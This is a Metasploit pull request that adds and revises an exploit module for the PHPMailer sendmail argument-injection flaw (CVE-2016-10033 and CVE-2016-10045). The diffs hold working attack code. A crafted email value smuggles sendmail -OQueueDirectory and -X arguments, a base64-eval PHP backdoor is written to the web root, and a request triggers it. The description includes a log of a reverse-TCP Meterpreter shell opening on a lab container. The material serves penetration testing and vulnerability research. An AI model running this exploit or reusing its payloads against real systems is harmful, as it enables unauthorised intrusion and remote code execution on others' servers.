### PR TITLE
PHPMailer Sendmail Argument Injection exploit module

### DIFF
--- a/modules/exploits/multi/http/phpmailer_arg_injection.rb
+++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -1,0 +1,120 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'PHPMailer Sendmail Argument Injection',
+      'Description'    => %q{
+        PHPMailer versions up to and including 5.2.20 are affected by a
+        vulnerability which can be leveraged by an attacker to write a file with
+        partially controlled contents to an arbitrary location through injection
+        of arguments that are passed to the sendmail binary. This module
+        writes a payload to the web root of the webserver before then executing
+        it with an HTTP request. The user running PHPMailer must have write
+        access to the specified WEB_ROOT directory and successful exploitation
+        can take a few minutes.
+      },
+      'Author'         => [
+        'Dawid Golunski',   # vulnerability discovery and original PoC
+        'Spencer McIntyre'  # metasploit module
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        ['CVE', '2016-10033'],
+        ['EDB', '40969'],
+        ['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'],
+        ['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html']
+      ],
+      'DisclosureDate' => 'Dec 26 2016',
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Payload'        => {'DisableNops' => true},
+      'Targets'        => [['Automatic', {}]],
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptEnum.new('VERSION', [true, 'The version of PHPMailer', '<=5.2.18', ['<=5.2.18', '5.2.20']]),
+        OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
+        OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www'])
+      ], self.class)
+    register_advanced_options(
+      [
+        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
+      ], self.class)
+  end
+
+  def trigger(trigger_uri)
+    print_status('Sleeping before requesting the written file')
+
+    page_found = false
+    sleep_time = 10
+    wait_time = datastore['WAIT_TIMEOUT']
+    print_status("Waiting for up to #{wait_time} seconds to trigger the payload")
+    while wait_time > 0
+      sleep(sleep_time)
+      wait_time -= sleep_time
+      res = send_request_cgi(
+        'method'   => 'GET',
+        'uri'      => trigger_uri
+      )
+
+      if res.nil?
+        if page_found or session_created?
+          print_good('Successfully triggered the payload')
+          break
+        end
+
+        next
+      end
+
+      next unless res.code == 200
+
+      if res.body.length == 0 and not page_found
+        print_good('Successfully found the payload')
+        page_found = true
+      end
+    end
+  end
+
+  def exploit
+    payload_file_name = "#{rand_text_alphanumeric(8)}.php"
+    payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
+
+    if datastore['VERSION'] == '<=5.2.18'
+      email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
+    elsif datastore['VERSION'] == '5.2.20'
+      email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
+    else
+      fail_with(Failure::NoTarget, 'The specified version is not supported')
+    end
+
+    data = Rex::MIME::Message.new
+    data.add_part('submit', nil, nil, 'form-data; name="action"')
+    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
+    data.add_part(email, nil, nil, 'form-data; name="email"')
+    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+
+    print_status("Writing the backdoor to #{payload_file_path}")
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri),
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => data.to_s
+    )
+
+    register_files_for_cleanup(payload_file_path)
+    trigger(normalize_uri(target_uri, payload_file_name))
+  end
+end

--- a/modules/exploits/multi/http/phpmailer_arg_injection.rb
+++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -48,8 +48,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
-        OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www'])
+        OptString.new('TARGETURI',  [true, 'Path to the application root', '/']),
+        OptString.new('TRIGGERURI', [false, 'Path to the uploaded payload', '']),
+        OptString.new('WEB_ROOT',   [true, 'Path to the web root', '/var/www'])
       ], self.class)
     register_advanced_options(
       [
@@ -58,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def trigger(trigger_uri)
-    print_status('Sleeping before requesting the written file')
+    print_status("Sleeping before requesting the payload from: #{trigger_uri}")
 
     page_found = false
     sleep_time = 10
@@ -117,6 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_files_for_cleanup(payload_file_path)
-    trigger(normalize_uri(target_uri, payload_file_name))
+
+    trigger(normalize_uri(datastore['TRIGGERURI'].blank? ? target_uri : datastore['TRIGGERURI'], payload_file_name))
   end
 end

--- a/modules/exploits/multi/http/phpmailer_arg_injection.rb
+++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'PHPMailer Sendmail Argument Injection',
       'Description'    => %q{
-        PHPMailer versions up to and including 5.2.20 are affected by a
+        PHPMailer versions up to and including 5.2.19 are affected by a
         vulnerability which can be leveraged by an attacker to write a file with
         partially controlled contents to an arbitrary location through injection
         of arguments that are passed to the sendmail binary. This module
@@ -31,6 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     => [
         ['CVE', '2016-10033'],
+        ['CVE', '2016-10045'],
+        ['EDB', '40968'],
         ['EDB', '40969'],
         ['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'],
         ['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html']
@@ -40,8 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_PHP,
       'Payload'        => {'DisableNops' => true},
       'Targets'        => [
-        ['PHPMailer <=5.2.18', {}],
-        ['PHPMailer 5.2.20', {}]
+        ['PHPMailer <5.2.18', {}],
+        ['PHPMailer 5.2.18 - 5.2.19', {}]
       ],
       'DefaultTarget'  => 0
     ))
@@ -95,10 +97,10 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
-    if target.name == 'PHPMailer <=5.2.18'
+    if target.name == 'PHPMailer <5.2.18'
       email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
-    elsif target.name == 'PHPMailer 5.2.20'
-      email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
+    elsif target.name == 'PHPMailer 5.2.18 - 5.2.19'
+      email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
     else
       fail_with(Failure::NoTarget, 'The specified version is not supported')
     end

--- a/modules/exploits/multi/http/phpmailer_arg_injection.rb
+++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -39,13 +39,15 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
       'Payload'        => {'DisableNops' => true},
-      'Targets'        => [['Automatic', {}]],
+      'Targets'        => [
+        ['PHPMailer <=5.2.18', {}],
+        ['PHPMailer 5.2.20', {}]
+      ],
       'DefaultTarget'  => 0
     ))
 
     register_options(
       [
-        OptEnum.new('VERSION', [true, 'The version of PHPMailer', '<=5.2.18', ['<=5.2.18', '5.2.20']]),
         OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
         OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www'])
       ], self.class)
@@ -92,9 +94,9 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
-    if datastore['VERSION'] == '<=5.2.18'
+    if target.name == 'PHPMailer <=5.2.18'
       email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
-    elsif datastore['VERSION'] == '5.2.20'
+    elsif target.name == 'PHPMailer 5.2.20'
       email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
     else
       fail_with(Failure::NoTarget, 'The specified version is not supported')


### PR DESCRIPTION
This adds an exploit module for the PHPMailer vulnerability identified by CVE-2016-10033. This has a default target that is applicable for versions <=5.2.18 but also includes an option for targeting `5.2.20` as well.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/phpmailer_arg_injection`
- [x] Set the `TARGETURI` and `WEB_ROOT` options as applicable
- [x] **Verify** the module yields a PHP meterpreter session in < 5 minutes
- [x] **Verify** the malicious PHP file was automatically removed

## Example usage

The options shown below are applicable for the `vulnerables/cve-2016-10033` Docker container.
```
msf (S:0 J:0) exploit(php_mailer) > reload
[*] Reloading module...

msf (S:0 J:0) exploit(php_mailer) > options 

Module options (exploit/linux/http/php_mailer):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.90.134   yes       The target address
   RPORT      8080             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to the application root
   VERSION    <=5.2.18         yes       The version of PHPMailer (Accepted: <=5.2.18, 5.2.20)
   VHOST                       no        HTTP server virtual host
   WEB_ROOT   /www             yes       Path to the web root


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.90.134   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



msf (S:0 J:0) exploit(php_mailer) > rexploit
[*] Reloading module...

[*] [2016.12.29-17:03:47] Started reverse TCP handler on 192.168.90.134:4444 
[*] [2016.12.29-17:03:47] Writing the backdoor to /www/0IxI5AFB.php
[*] [2016.12.29-17:04:07] Sleeping before requesting the written file
[*] [2016.12.29-17:04:07] Waiting for up to 300 seconds to trigger the payload
[+] [2016.12.29-17:04:48] Successfully found the payload
[*] [2016.12.29-17:05:50] Sending stage (34122 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (192.168.90.134:4444 -> 172.17.0.2:47280) at 2016-12-29 17:05:50 -0500
[+] [2016.12.29-17:05:50] Deleted /www/0IxI5AFB.php
[+] [2016.12.29-17:06:10] Successfully triggered the payload


meterpreter > sysinfo
Computer    : 90f0c8e8dbe4
OS          : Linux 90f0c8e8dbe4 4.8.15-200.fc24.x86_64 #1 SMP Thu Dec 15 23:09:22 UTC 2016 x86_64
Meterpreter : php/linux

meterpreter >
```
